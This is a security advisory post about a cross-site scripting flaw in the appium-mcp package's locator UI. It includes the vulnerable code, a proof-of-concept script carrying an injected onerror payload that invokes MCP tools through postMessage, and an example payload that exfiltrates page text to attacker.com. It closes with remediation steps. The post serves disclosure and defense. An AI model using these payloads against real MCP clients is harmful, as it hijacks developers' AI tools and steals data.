Listen to this Post
How VULN-001 Works
The `appium-mcp` package provides AI-assisted mobile automation tools. The `createLocatorGeneratorUI` function, found in `src/ui/mcp-ui-utils.ts` at lines 730–740, is responsible for generating an HTML user interface that displays element locators.
This function builds an HTML string using template literals. It interpolates several values directly into this HTML without any sanitization:
– `element.text`
– `element.contentDesc`
– `element.resourceId`
– The `selector` string
– The `strategy` string
The values for text, content-desc, and `resource-id` originate from an XML page source provided by an Appium session. An attacker who controls the UI of the application under test can inject malicious HTML and JavaScript code into these attributes. The data flow is as follows:
1. Source: `src/tools/test-generation/locators.ts:57` reads the page source XML from the Appium session. The connected app is attacker-controlled.
2. Parsing: `src/locators/source-parsing.ts:108` processes the XML. It only replaces newline characters (\n) and does not re-encode HTML entities like <, which are decoded into raw characters by the XML parser.
3. Extraction: `src/locators/generate-all-locators.ts:73–75` copies the text, content-desc, and `resource-id` attributes verbatim into the locator result object.
4. UI Generation: `src/tools/test-generation/locators.ts:90` passes these locator objects to createLocatorGeneratorUI.
5. Sink: `src/ui/mcp-ui-utils.ts:730–740` interpolates the unsanitized values directly into the HTML response.
This lack of escaping allows an attacker to break out of the HTML context and inject arbitrary scripts. The `onclick` attribute in the generated UI also embeds the `selector` and `strategy` values, using only backtick escaping which is insufficient to prevent injection.
When a victim’s MCP client renders this HTML resource (e.g., in a WebView or iframe), the injected JavaScript executes. The `window.parent.postMessage` mechanism, used throughout src/ui/mcp-ui-utils.ts, then allows this injected script to invoke any registered MCP tool. This can lead to unauthorized actions such as taking screenshots, reading page sources, or executing scripts on the device.
A key detail is that the `createPageSourceInspectorUI` function in `src/ui/mcp-ui-utils.ts:911–916` does apply proper escaping, confirming that this vulnerability is an oversight rather than an architectural choice.
DailyCVE Form
Platform: ……. Appium-MCP
Version: …….. v1.85.8, v1.85.9
Vulnerability :…… Cross-Site Scripting (XSS)
Severity: ……. Critical
date: ………. 2026-06-19
Prediction: ….. 2026-07-03
What Undercode Say: Analytics
The vulnerability stems from a failure to apply context-appropriate escaping. The `createLocatorGeneratorUI` function directly embeds attacker-controlled strings into an HTML template, creating a classic XSS sink.
Vulnerable Code Snippet (src/ui/mcp-ui-utils.ts:730–740):
${element.text ? `<p class="element-text"><strong>Text:</strong> ${element.text}</p>` : ''}
${element.contentDesc ? `<p class="element-text"><strong>Content Desc:</strong> ${element.contentDesc}</p>` : ''}
${element.resourceId ? `<p class="element-text"><strong>Resource ID:</strong> <code>${element.resourceId}</code></p>` : ''}
<code>${selector}</code>
<button class="test-btn" onclick="testLocator('${strategy}', `${selector.replace(/`/g, '\\`')}`)">Test</button>
Static Confirmation (No Appium Session Required):
node --input-type=module <<'EOF'
import { generateAllElementLocators } from './dist/locators/generate-all-locators.js';
import { createLocatorGeneratorUI } from './dist/ui/mcp-ui-utils.js';
const xml = <code><hierarchy>
<node class="android.widget.TextView"
clickable="true"
enabled="true"
displayed="true"
text="<img src=x onerror=\"window.parent.postMessage({type:'tool',payload:{toolName:'appium_screenshot',params:{}},'')\">"
content-desc="<b>xss-in-contentDesc</b>"
resource-id="com.attacker.app/<u>xss-resource-id</u>"/>
</hierarchy></code>;
const locators = generateAllElementLocators(xml, true, 'uiautomator2', { fetchableOnly: true });
const html = createLocatorGeneratorUI(locators);
console.log('UNESCAPED <img src=x onerror= present:', html.includes('<img src=x onerror='));
console.log('UNESCAPED <b> in contentDesc present: ', html.includes('<b>xss-in-contentDesc</b>'));
console.log('UNESCAPED <u> in resourceId present: ', html.includes('<u>xss-resource-id</u>'));
EOF
Expected Output:
UNESCAPED <img src=x onerror= present: true UNESCAPED <b> in contentDesc present: true UNESCAPED <u> in resourceId present: true
Dynamic Confirmation (Docker, Network-Isolated):
Build context is the parent directory (contains repo/ and vuln-001/) docker build -t appium-mcp-vuln-001 \ -f vuln-001/Dockerfile \ reports/npmAI_303_appium__appium-mcp docker run --rm --network none appium-mcp-vuln-001
The container output confirms the XSS payload is present in the generated HTML.
Exploit:
An attacker can exploit this vulnerability by creating a malicious mobile application. The app’s UI elements (e.g., text, content-desc, resource-id) are crafted to contain an XSS payload.
Example Payload:
<img src=x onerror="window.parent.postMessage({type:'tool',payload:{toolName:'execute_script',params:{script:'fetch('http://attacker.com/steal?data='+document.body.innerText)'}},'')">
When a victim developer uses the `appium-mcp` server to connect to this malicious app and calls the `generate_locators` tool, the MCP client renders the returned HTML. The injected `onerror` handler fires, sending a crafted `postMessage` to the parent frame. This causes the MCP host to invoke the `execute_script` tool, exfiltrating data to the attacker’s server.
Protection:
Remediation requires implementing proper output encoding for all data interpolated into HTML and JavaScript contexts.
1. HTML Context Escaping: Apply an HTML-escaping helper to all element properties (text, contentDesc, resourceId, selector) before insertion. This helper must replace characters like &, <, >, ", and `’` with their corresponding HTML entities.
2. JavaScript Context Escaping: For values embedded in JavaScript string literals (e.g., inside `onclick` attributes), use `JSON.stringify` to safely encode the data.
3. Secure Coding Practice: Adopt a secure templating approach that automatically escapes content based on the context, or use a trusted library for sanitization.
Impact:
This is a critical Cross-Site Scripting (XSS) vulnerability. Any developer using `appium-mcp` with an MCP client that renders HTML resources is at risk when inspecting elements from an attacker-controlled application.
Potential Impact Scenarios:
– Arbitrary MCP Tool Invocation: Injected JavaScript can invoke any MCP tool, such as appium_screenshot, execute_script, or get_page_source, without user consent.
– Data Exfiltration: Attackers can use `execute_script` or screenshot tools to extract sensitive data from the device screen or page source.
– Lateral Movement: If the MCP host exposes file-system or shell tools, the attacker could escalate to arbitrary code execution on the developer’s machine.
– Supply Chain Attacks: Automated test pipelines that call `generate_locators` against third-party app builds are equally vulnerable.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
